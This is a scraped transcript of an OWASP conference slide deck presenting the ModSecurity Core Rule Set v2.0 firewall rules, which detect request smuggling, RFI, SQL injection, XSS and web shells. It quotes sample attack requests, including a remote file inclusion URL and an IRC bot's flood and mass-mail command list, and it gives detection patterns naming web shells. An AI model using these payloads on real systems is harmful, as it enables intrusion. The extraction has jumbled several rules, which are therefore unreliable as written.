ModSecurity Core Rule Set (CRS) v2.0 AppSec DC Ryan Barnett OWASP Project Leader Director of Application Security Research, Breach Security [email protected] Copyright © The OWASP Foundation Permission is granted to.
Download
Report
Transcript ModSecurity Core Rule Set (CRS) v2.0 AppSec DC Ryan Barnett OWASP Project Leader Director of Application Security Research, Breach Security [email protected] Copyright © The OWASP Foundation Permission is granted to.
ModSecurity
Core Rule Set (CRS)
v2.0
AppSec DC
Ryan Barnett
OWASP Project Leader
Director of Application Security Research,
Breach Security
[email protected]
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org/
About The Speaker
Community Participation:
OWASP ModSecurity Core Rule Set
Project Leader
Web Application Security Consortium
(WASC) Board Member
WASC Distributed Open Proxy
Honeypot Project Leader
Day Job:
Director of Application Security
Research, Breach Security
In charge of security research through
Breach Security Labs, development of
ModSecurity rules and signatures.
What are we going to talk about
ModSecurity Quick Overview
The Core Rule Set (CRS) Overview
Basic Detection Categories
CRS v2.0 Improvements
Facilitating Community Collaboration
Call for Community Help
3
What is ModSecurity?
It is an open source web application firewall (WAF)
module for Apache web servers
www.modsecurity.org
Separate Rule and Audit Engines
Allows full request/response HTTP logging capability
Deep understanding of HTTP and HTML
Robust Parsing (form encoding, multipart and XML)
Anti Evasion Features (normalization functions)
Supports Complex Rules Language
Advanced Capabilities
Transactional and Persistent Collections
Content Injection
Lua API
ModSecurity’s Apache Request Cycle Hooks
ModSecurity’s Rules Language
It's a simple event-based programming language.
Five processing
phases, one for
each major
processing step.
Look at any part
of the
transaction.
Transform data
to counter
evasion.
Combine rules
to form complex
logic.
Common tasks are easy (the Core Rule Set), complex tasks
are possible (Virtual Patching).
ModSecurity’s Rules Language Syntax
Tells ModSecurity how
to process data (such
@rx, @pm or @gt).
SecRule TARGETS OPERATOR [ACTIONS]
Tells ModSecurity where
to look (such as ARGS,
ARGS_NAMES or
COOKIES).
Tells ModSecurity what to
do if a rule matches (such
as deny, exec or setvar).
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
CRS v2.0
Overview
AppSec DC
The OWASP Foundation, http://www.owasp.org/
What is the Core Rule Set (CRS)?
A generic, plug-n-play set of WAF rules
Detection Mechanisms:
Protocol Validation
Malicious Client Identification
Generic Attack Signatures
Known Vulnerabilities Signatures
Trojan/Backdoor Access
Outbound Data Leakage
Anti-Virus and DoS utility scripts
OWASP Project Homepage
http://www.owasp.org/index.php/Category:OWASP_ModSec
urity_Core_Rule_Set_Project
Who uses the CRS?
WASC Distributed Open Proxy Honeypot Project
“Use one of the web attacker's most trusted tools against
him - the Open Proxy server. Instead of being the target of
the attacks, we opt to be used as a conduit of the attack
data in order to gather our intelligence”
http://projects.webappsec.org/Distributed-Open-Proxy-Honeypots
Who uses the CRS?
Akamai WAF-in-the-Cloud Service
Converted CRS in Akamai Edge Servers
Launched in November 2009
Akamai
EdgePlatform
with WAF
Origin
Server
Attacker
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
Example Detection Categories
AppSec DC
The OWASP Foundation, http://www.owasp.org/
Detection Mechanisms: Protocol Violations
Protocol vulnerabilities such as Response Splitting,
Request Smuggling, Premature URL ending
Content length only for non GET/HEAD methods
Non ASCII characters or encoding in headers
Valid use of headers (for example, content length is numerical)
Proxy Access
modsecurity_crs_20_protocol_violations.conf
Attack requests are different due to automation
Missing headers such as Host, Accept, User-Agent
Host is an IP address (common worm propagation method)
modsecurity_crs_21_protocol_anomalies.conf
HTTP Request Smuggling Example
Goal: IDS/IPS will only see one POST request to
/foobar.html
POST http://SITE/foobar.html HTTP/1.1
...
IDS/IPS:
1. /foobar.html
Content-Length: 0
Server:
Content-Length: 44
1. /foobar.html
2. /foo.php
GET /cgi-bin/foo.php?cmd=`id` HTTP/1.1
Host: SITE
CRS ID 950012 – Request Smuggling Attack
POST /SITE/foobar.html HTTP/1.1
Host: www.badstore.net
Apache collapses duplicate
User-Agent:
Mozilla/5.0
(Windows;
U; Windows NT 5.1; en-US;
Request
headers and
separates
rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
the payloads with commas –
Accept:
this payload means there were
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:
en-us
two Content-Length
headers
Request Smuggling rule
Accept-Encoding: gzip,deflate
looks for a comma in the
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
appropriate Request
Keep-Alive: 300
header payloads
Proxy-Connection: keep-alive
Content-Length: 0, 44
# HTTP Request Smuggling
SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' ","
"phase:2,t:none,block,nolog,auditlog,status:400,msg:'HTTP Request
Smuggling Attack.',id:'950012',tag:'WEB_ATTACK/REQUEST_SMUGGLING',
severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+
20,setvar:tx.web_attack_score=+1,setvar:tx.%{rule.id}WEB_ATTACK/REQUEST_SMUGGLING-%{matched_var_name}=%{matched_var}"
Detection Mechanisms: Protocol Policies
Policy is usually application specific
Some restrictions can usually be applied generically
White lists can be build for specific environments
Limitations on Sizes
Request size, Upload size
# of parameters, length of parameter
modsecurity_crs_23_request_limits.conf
Items that can be allowed or restricted
Methods - Allow or restrict WebDAV, block abused methods
such as CONNECT, TRACE or DEBUG
File extensions – backup files, database files, ini files
Content-Types (and to some extent other headers)
Modsecurity_crs_30_http_policy.conf
CRS ID 960012 – Request Method Not Allowed
PUT
/tr.htm
HTTP/1.0
SecRule
REQUEST_METHOD
Accept-Language: pt-br, en-us;q=0.5
"!^((?:(?:POS|GE)T|OPTIONS|HEAD))$"
Translate:
f
"phase:2,t:none,block,nolog,auditlog,
Content-Length:
67
status:501,msg:'Method
is not allowed
Date:
Thu, 5 Nov 2009 04:26:22 GMT
by policy',
Connection: Keep -Alive
severity:'2',id:'960032',tag:'POLICY/
User-Agent: Microsoft Data Access Internet
METHOD_NOT_ALLOWED',setvar:tx.anomaly
Publishing Provider DAV 1.1
_score=+5,setvar:tx.policy_score=+1,s
Host: www.example.com
etvar:tx.%{rule.id}POLICY/METHOD_NOT_ALLOWEDCommand Tribulation was here www.commandt.org
- Jesus Loves you
%{matched_var_name}=%{matched_var}"
Detection Mechanisms: Malicious Clients
Not aimed against targeted attacks, but against general
malicious internet activity
Offloads a lot of cyberspace junk & noise
Effective against comment spam
Reduce event count
Detection of Malicious Robots
Unique request attributes: User-Agent header, URL, Headers
Black list of IP addresses
Rate based detection
Detection of security scanners
Blocking can confuse security testing software (WAFW00f)
modsecurity_crs_35_bad_robots.conf
Comment SPAM – RBL Lookups
SecRule &IP:SPAMMER "@eq 0"
"chain,phase:1,t:none,block,nolog,auditlog,msg:'
RBL Match for SPAM
Source',tag:'AUTOMATION/MALICIOUS',severity:'2',
skipAfter:END_RBL_CHECK"
SecRule REMOTE_ADDR "@rbl sbl-xbl.spamhaus.org"
"t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.au
tomation_score=+1,setvar:tx.anomaly_score=+20,se
tvar:'tx.%{rule.id}=%{matched_var_name}=%{matche
d_var}',setvar:ip.spammer=1,expirevar:ip.spammer
=86400“
Detection Mechanisms: App Layer Attacks
Detect application level attacks such as those described
in the OWASP top 10
SQL injection and blind SQL injection
Cross site scripting (XSS)
OS command injection and remote command access
Remote file inclusion
modsecurity_crs_40_generic_attacks.conf
modsecurity_crs_41_sql_injection_attacks.conf
modsecurity_crs_41_xss_attacks.conf
Remote File Inclusion (RFI) Example
IP address in
HTTP/1.1
hostname
GET /XXXXXXXX.php?ADODB_DIR=http://www.filmbox.ru/d.pl?
TE: deflate,gzip;q=0.3
SecRule
ARGS "^(?:ht|f)tps?:\/\/([\d\.]+)" \
Connection: TE, close
Host: XXXXXXXXXXX
Known vulnerable
User-Agent: libwww-perl/5.805
parameter
switch(substr($mcmd[0],1))
{
SecRule
ARGS "(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)"
\
SecRule
SecRule
case "restart":
One or more
case "mail": //mail to from subject message
case "dns":
question marks
case "info":
ARGScase
"(?:ft|htt)ps?.*\?+$"
\
at the end
"cmd":
case "rndnick":
Control Methods
case "php":
case "exec": break;
Domain mis"pscan": // .pscan 127.0.0.1 6667
ARGScase
"^(?:ht|f)tps?://(.*)\?$"
\
case "ud.server": // .udserver <server> <port>
match
"chain,
case "download":
case "die":
SecRule
TX:1 "!@beginsWith %{request_headers.host}”
case "udpflood":
Attack Methods
case "udpflood1":
case "tcpflood":
case "massmail":
Detection Mechanisms: Trojans/Backdoors
Major problem in hosting environments
Uploading is allowed
Some sites may be secure while others not
Upload detection
Check uploading of files containing viruses (i.e. WORD docs)
util/modsec-clamscan.pl
Check uploading of http backdoor page
Access detection
Known signatures (x_key header)
Generic file management output (gid, uid, drwx, c:\)
modsecurity_crs_45_trojans.conf
CRS ID 950922 – Trojan File Access
SecRule RESPONSE_BODY
"(?:<title>[^<]*?(?:\b(?:(?:c(?:ehennemden|gi-telnet)|gamma
web shell)\b|imhabirligi phpftp)|(?:r(?:emote
explorer|57shell)|aventis klasvayv|zehir)\b|\.::(?:news
remote php shell injection::\.| rhtools\b)|ph(?:p(?:(?:
commander|terminal)\b|remoteview)|vayv)|myshell)|\b(?:(?:(?:microsoft
windows\b.{0,10}?\bversion\b.{0,20}?\(c\) copyright 1985.{0,10}?\bmicrosoft corp|ntdaddy v1\.9 - obzerve \| fux0r
inc)\.|(?:www\.sanalteror\.org - indexer and
read|haxplor)er|php(?:konsole|
shell)|c99shell)\b|aventgrup\.<br>|drwxr))" \
"phase:4,t:none,ctl:auditLogParts=+E,block,nolog,auditlog,s
tatus:404,msg:'Backdoor
access',id:'950922',tag:'MALICIOUS_SOFTWARE/TROJAN',severit
y:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1
,setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}MALICIOUS_SOFTWARE/TROJAN%{matched_var_name}=%{matched_var}"
Detection Mechanisms: Information Leakage
Monitoring outbound application data
HTTP Error Response Status Codes
SQL Information Leakage
Stack Dumps
Source Code Leakage
Last line of defense if all else fails
Provide feedback to application developers
Important for customer experience
Makes life for the hacker harder (if blocking is used)
modsecurity_crs_50_outbound.conf
CRS ID 971094 – SQL Information Leakage
SecRule RESPONSE_BODY "\bYou have an error in your SQL
syntax near \'" \
"phase:4,t:none,ctl:auditLogParts=+E,block,nolog,auditlog,s
tatus:500,msg:'SQL Information
Leakage',id:'971094',tag:'LEAKAGE/ERRORS',severity:'3',setv
ar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+15,setvar:
tx.%{rule.id}-LEAKAGE/ERRORS%{matched_var_name}=%{matched_var}"
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
CRS v2.0 Improvements
AppSec DC
The OWASP Foundation, http://www.owasp.org/
CRS V2.0 Improvements
Rules and Alert Management
Collaborative Rules/Anomaly Scoring
Conditional Rules (Weak Signatures)
Inbound+Outbound Correlation
Updated Severity Ratings
Increased Security Coverage
XSS Improvements
Converted Emerging Threats Web Attack Signatures
Converted PHPIDS Filters
Facilitate Community Collaboration
CRS Smoketest/Demo Page
JIRA Bug Tracking
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
Rules and Alert Management
AppSec DC
The OWASP Foundation, http://www.owasp.org/
CRS <2.0 – Self Contained Rules Concept
Older (<2.0) CRS used individual, “self-contained”
actions in rules
If a rule triggered, it would either deny or pass and log
No intelligence was shared between rules
Not optimal from a rules management perspective
(handling false positives/exceptions)
Editing the regex could blow it up
Heavily customized rules were less likely to be updated by
the user
Not optimal from a security perspective
Not every site had the same risk tolerance
Lower severity alerts were largely ignored
CRS 2.0 - Collaborative Rules/Anomaly Scoring
Rules logic has changed by decoupling the
inspection/detection from the blocking functionality
Rules set transactional variables (tx) to store meta-data
about the rule match
Rules also increase anomaly scores for both the attack
category and global score
These rules are considered basic or reference events
They do not generate an event in the Apache
error_log on their own by default
The anomaly score check/enforcement rules will
decided whether or not to deny/log events
modsecurity_crs_49_enforcement.conf
CRS 2.0 - Collaborative Rules/Anomaly Scoring
Example HTTP Parameter Pollution (HPP) attack
/index.aspx?page=select 1&page=2,3 from table where
id=1
#
# HTTP Parameter Pollution
#
SecRule ARGS_NAMES ".*" \
"chain,phase:2,t:none,nolog,auditlog,pass,capture,id:'950012'setvar:'tx.a
rg_name_%{tx.0}=+1',msg:'Possible HTTP Parameter Pollution Attack:
Multiple Parameters with the same Name.'"
SecRule TX:/ARG_NAME_*/ "@gt 1"
"t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx
.web_attack_score=+1,setvar:tx.%{rule.id}-WEB_ATTACK/COMMAND_INJECTION%{matched_var_name}=%{matched_var}"
CRS 2.0 – Debug Log View
[4] Executing operator "gt" with param "1" against TX:arg_name_page.
[9] Target value: "2"
[4] Operator completed in 5 usec.
[9] Setting variable: tx.msg=%{rule.msg}
[9] Resolved macro %{rule.msg} to "Possible HTTP Parameter Pollution Attack:
Multiple Parameters with the same Name."
[9] Set variable "tx.msg" to "Possible HTTP Parameter Pollution Attack:
Multiple Parameters with the same Name.".
[9] Setting variable: tx.anomaly_score=+20
[9] Recorded original collection variable: tx.anomaly_score = "0"
[9] Relative change: anomaly_score=0+20
[9] Set variable "tx.anomaly_score" to "20".
[9] Setting variable: tx.web_attack_score=+1
[9] Recorded original collection variable: tx.web_attack_score = "0"
[9] Relative change: web_attack_score=0+1
[9] Set variable "tx.web_attack_score" to "1".
[9] Setting variable: tx.%{rule.id}-WEB_ATTACK/COMMAND_INJECTION%{matched_var_name}=%{matched_var}
[9] Resolved macro %{rule.id} to "950012"
[9] Resolved macro %{matched_var_name} to "TX:arg_name_page"
[9] Resolved macro %{matched_var} to "3"
[9] Set variable "tx.950012-WEB_ATTACK/COMMAND_INJECTION-TX:arg_name_page"
to "2".
[4] Warning. Operator GT matched 1 at TX:arg_name_page. [file
"/usr/local/apache/conf/modsecuritycrs_2.0.3/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "28"]
[msg "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the
same Name."]
CRS 2.0 – Inspecting Anomaly Scores
# Alert on SQL Injection anomalies
#
#SecRule TX:SQLI_SCORE "@gt 0" \
#
"phase:2,t:none,log,deny,msg:'SQL Injection
Detected (score %{TX.SQLI_SCORE}): %{tx.msg}'"
# Alert and Deny on High Anomaly Scores
#
SecRule TX:ANOMALY_SCORE "@ge 20" \
"phase:2,t:none,nolog,auditlog,deny,msg:'Anomaly
Score Exceeded (score %{TX.ANOMALY_SCORE}):
%{tx.msg}',setvar:tx.inbound_tx_msg=%{tx.msg}"
CRS 2.0 – Conditional Rules (Weak Sigs)
SQL Injection Example
Aggregate indicators to determine an attack
Strong indicators
Keywords such as: xp_cmdshell, varchar,
Sequences such as: union …. select, select … top … 1
Amount: script, cookie and document appear in the
same input field
Weak indicators – meta-characters
--, ;, ', …
CRS only applies weak signatures in the event a
stronger signature has previously triggered
CRS 2.0 – Conditional Rule Example
SecMarker BEGIN_SQL_INJECTION_WEAK
SecRule &TX:/SQL_INJECTION/ "@eq 0"
"phase:2,t:none,nolog,pass,skipAfter:END_SQL_INJECTION_WEAK"
SecRule TX:/SQL_INJECTION/
"\b(?:rel(?:(?:nam|typ)e|kind)|a(?:ttn(?:ame|um)|scii)|c(?:o(?:nver|un)t|ha?r
)|s(?:hutdown|elect)|to_(?:numbe|cha)r|u(?:pdate|nion)|d(?:elete|rop)|group\b
\W*\bby|having|insert|length|where)\b" \
"phase:2,chain,capture,t:none,ctl:auditLogParts=+E,block,nolog,auditlog
,msg:'SQL Injection
Attack',id:'950001',tag:'WEB_ATTACK/SQL_INJECTION',logdata:'%{TX.0}',severity
:'2'"
SecRule MATCHED_VAR "(?:[\\\(\)\%#]|--)" \
"t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.sqli_score=+1,setvar:tx.a
nomaly_score=+20,setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION%{matched_var_name}=%{matched_var}"
SecMarker END_SQL_INJECTION_WEAK
CRS 2.0 – Inbound/Outbound Correlation
Concept is to do post processing of the transactional
data (in the logging phase) for event creation
modsecurity_crs_60_correlation.conf
Couple the inbound with the outbound for increased
intelligence
Was there an inbound attack?
Was there an HTTP Status Code Error (4xx/5xx level)?
Was there an application information leak?
Correlation facilitates better incident response
App error without inbound attack -> Contact Ops
Inbound attack + outbound error -> Contact Security
CRS 2.0 – Updated Severity Ratings
Correlated Events
0: Emergency - is generated from correlation (inbound attack +
outbound leakage)
1: Alert - is generated from correlation (inbound attack + outbound
application level error)
Non-Correlated Events
2: Critical - highest severity level possible without correlation. It is
normally generated by the web attack rules (40 level files)
3: Error - is generated from outbound leakage rules (50 level files)
4: Warning - is generated by malicious client rules (35 level files)
5: Notice - is generated by the Protocol policy and anomaly files
6: Info - is generated by the search engine clients (55 marketing
file)
CRS 2.0 – Correlated Event Messages
Message: Pattern match "\;\W*?\bdrop\b" at TX:pm_sqli_data_REQUEST_URI.
[file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"
] [line "262"] [id "959001"] [msg "SQL Injection Attack"] [data "; drop"]
[severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"]
Message: Operator GE matched 0 at TX:anomaly_score. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_49_enforcement.conf"] [line
"30"] [msg "Anomaly Score Exceeded (score 55): SQL Injection Attack
Detected"]
Message: Pattern match "\bsupplied argument is not a valid MySQL\b" at
RESPONSE_BODY. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_50_outbound.conf"] [line
"259"] [id "971156"] [msg "SQL Information Leakage"] [severity "ERROR"] [tag
"LEAKAGE/ERRORS"]
Message: Warning. Operator GE matched 1 at TX. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_60_correlation.conf"] [line
"24"] [msg "Correlated Successful Attack Identified: Inbound Attack (SQL
Injection Attack Detected) + Outbound Data Leakage (SQL Information Leakage)
- (Transactional Anomaly Score: 85)"] [severity "EMERGENCY"]
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
Increased Security Coverage
AppSec DC
The OWASP Foundation, http://www.owasp.org/
CRS 2.0 – Updated XSS Coverage
Rules added that look for all event handlers from the WASC
Script Mapping Project
http://projects.webappsec.org/Script-Mapping
CRS 2.0 – Converted Emerging Threats Rules
Breach Security Labs received authorization from ET to
convert their Snort rules and include them in the CRS
http://www.emergingthreats.net/
Converted the following rule files
emerging-web_server.rules
emerging-web_specific_apps.rules
Identifying attacks against known vulnerabilities does
have value
Raised threat level
If done correctly, lessens false positives
CRS combines the what of our generic attack payload
detection with the where of ET known vuln data
CRS 2.0 – Converted Emerging Threats Rules
alert tcp $EXTERNAL_NET
anyvector
-> $HTTP_SERVERS
Attack
location –
$HTTP_PORTS (msg:"ET WEB_SPECIFIC_APPS
20/20 Auto
URI + Parameter
Gallery SQL Injection Attempt -- vehiclelistings.asp
vehicleID SELECT"; flow:established,to_server;
uricontent:"/vehiclelistings.asp?"; nocase;
uricontent:"vehicleID="; nocase;
uricontent:"SELECT"; nocase;
pcre:"/.+SELECT.+FROM/Ui"; classtype:webapplication-attack; reference:cve,CVE-2006-6092;
reference:url,www.securityfocus.com/bid/21154;
reference:url,doc.emergingthreats.net/2007504;
PCRE –
reference:url,www.emergingthreats.net/cgiWeak signature
bin/cvsweb.cgi/sigs/WEB_SPECIFIC_APPS/WEB_2020_Auto_
gallery; sid:2007504; rev:5;)
CRS 2.0 – Converted Emerging Threats Rule
Verify the URI of
the request
# (sid 2007508) ET WEB_SPECIFIC 20/20 Auto Gallery SQL Injection
Attempt -- vehiclelistings.asp vehicleID
SecRule REQUEST_URI_RAW "(?i:\/vehiclelistings\.asp)"
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:norma
lisePathWin,capture,ctl:auditLogParts=+E,nolog,auditlog,logdata:'%{TX
.0}',id:sid2007508,rev:3,msg:'ET
WEB_SPECIFIC
20/20 Auto Gallery SQL
Verify the attack
vector
Injection Attempt -- vehiclelistings.asp
',tag:‘weblocation from saved TXvehicleID
SQL
Injection data exists
application-attack',tag:'url,www.emergingthreats.net/cgibin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_2020_Auto_gallery'"
SecRule &TX:'/SQL_INJECTION.*ARGS:vehicleID/' "@gt 0"
"setvar:'tx.msg=ET WEB_SPECIFIC 20/20 Auto Gallery SQL Injection
Attempt -- vehiclelistings.asp vehicleID
',setvar:tx.sqli_score=+1,setvar:tx.anomaly_score=+20,setvar:tx.%{rul
e.id}-SQL_INJECTION/SQL_INJECTION-%{matched_var_name}=%{matched_var}"
CRS 2.0 – Converted PHPIDS Filters
http://phpids.net/
~70 regular expression rules to detect common attack
payloads
XSS
SQL Injection
RFI
Filters are heavily tested by the community and updated
frequently
Breach Security Labs received authorization from PHPIDS
to convert their default_filters.xml rules and include them
in the CRS
https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml
Thanks to Mario Heiderich
CRS 2.0 – PHPIDS Example Filter
<filter>
<id>1</id>
<rule><![CDATA[(?:"[^"]*[^]?>)|(?:[^\w\s]\s*\/>)|(?:>")]]></rule>
<description>finds html breaking injections
including whitespace attacks</description>
<tags>
<tag>xss</tag>
<tag>csrf</tag>
</tags>
<impact>4</impact>
</filter>
CRS 2.0 – Converted PHPIDS Example Filter
Combats common evasions with multiMatch action
Normal process is to only apply the operator once after the
transformation function chain
With multiMath, the operator is applied before/after any
transformation function that changes data
SecRule ARGS|ARGS_NAMES "(?:\"[^\"]*[^]?>)|(?:[^\w\s]\s*\/>)|(?:>\")"
"phase:2,capture,multiMatch,t:none,t:urlDecodeUni,t:cssDecod
e,t:jsDecode,t:htmlEntityDecode,t:replaceComments,t:compress
WhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,nolog,msg:
'finds html breaking injections including whitespace
attacks',id:'phpids1',tag:'WEB_ATTACK/XSS',tag:'WEB_ATTACK/CSRF',logdata:'%{TX.
Normalization
0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anoma
functions
ly_score=+4,setvar:tx.%{rule.id}-WEB_ATTACK/INJECTION%{rule.severity}-%{rule.msg}%{matched_var_name}=%{matched_var}"
CRS 2.0 – PHPIDS Conversion/Normalization
PHPIDS combats evasions by both converting and
normalizing input data before applying their regular
expressions
https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php
Handles evasion issues such as:
Comments
Newlines
Charcode
Normalize Quotes
Current CRS approach is to create rules to increase the
anomaly score when these are encountered vs.
attempting to normalize
CRS 2.0 – PHPIDS Centrifuge
Negative security approach to combating XSS and SQL
Injection is doomed to fail…
Unlimited ways to write functionally equivalent code
Obfuscation methods, however often have certain characteristics
PHPIDS has an interesting approach to identify attack
payloads through heuristics
Analysis of the use of special characters
Ratio between the count of the word characters, spaces,
punctuation and the non word characters
If <3.50 = malicious
Normalization and stripping of any word character and
spaces including line breaks, tabs and carriage returns
Regex check in default_filters.xml catches results
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
Facilitate Community Collaboration
AppSec DC
The OWASP Foundation, http://www.owasp.org/
CRS 2.0 – CRS Demo/Smoketest
ModSecurity/CRS finally has its own Demo/Smoketest
page
http://www.modsecurity.org/demo/
CRS 2.0 – CRS/PHPIDS Demo/Smoketest
CRS demo page is actually a front-end for the PHPIDS
smoketest page
http://demo.php-ids.org/
Request will go through CRS page first and then we
proxy the request to the PHPIDS page
We then inspect the inbound with the outbound and
provide results
CRS detected an attack
CRS did not find anything malicious but PHPIDS did
Neither CRS nor PHPIDS found anything malicious
A link is provided to report false negatives to our JIRA
ticketing system
https://www.modsecurity.org/tracker/browse/CORERULES
CRS 2.0 – CRS Demo/Smoketest
The ModSecurity Core Rule Set (CRS)
Ryan Barnett
[email protected]
Call for Community Help
AppSec DC
The OWASP Foundation, http://www.owasp.org/
CRS 2.0 – Call for Community Help
We have made great strides with CRS v2.0 but there is
still much work to be done
Current OWASP Project Status is Alpha
Need some help to move it to Beta -> Release Quality
Need Project Reviewers
Test out the CRS demo page and report any issues found
either to the mail-list or to JIRA
Cool project idea
Port the PHPIDS Converter.php code into Lua for use in
ModSecurity
Please sign up on our project mail-list if you want to help
https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-corerule-set
Thank You!
Ryan Barnett
[email protected]
AppSec DC
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org/